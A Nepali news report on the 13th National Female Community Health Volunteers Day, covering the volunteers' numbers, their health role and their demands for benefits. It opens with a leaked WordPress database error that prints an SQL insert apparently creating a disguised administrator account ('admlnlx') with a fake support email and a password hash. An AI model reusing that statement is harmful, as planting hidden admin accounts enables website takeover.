WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDzllP000AUYQzWWyULWqVf34R0YC.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 07:25:38', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १९ –
आइतबार १३ औं राष्ट्रिय महिला स्वास्थ्य स्वयंसेविका दिवस । नेपालमा अहिले ५० हजार महिला स्वास्थ्य स्वयंसेविका रहेको स्वास्थ्य मन्त्रालयले जनाएको छ ।
कूल प्रजनन् दर, बाल मृत्युदर र मातृ मृत्युदर घटाउने राष्ट्रिय लक्ष्य प्राप्त गर्न स्वास्थ्य स्वयंसेविका कार्यक्रम सञ्चालन भइरहेको स्वास्थ्य मन्त्रालयले जनाएको छ ।
दिवसको अवसरमा महिला स्वास्थ्य स्वयंसेविकाले स्वास्थ्य क्षेत्रमा पुर्याएको योगदान बारे छलफल गर्ने, सफलताको कथा सुनाउने तथा थप प्रोत्साहनका लागि सरोकारवालालाई उत्प्रेरित गर्ने उद्देश्यले देशभरी नै विभिन्न कार्यक्रम गर्न लागिएको मन्त्रालयले जनाएको छ । स्वास्थ्य स्वंयसेविकाहरुले सेवा वापत सरकारले केही सुविधा दिनु पर्ने माग गर्दै आएका छन् ।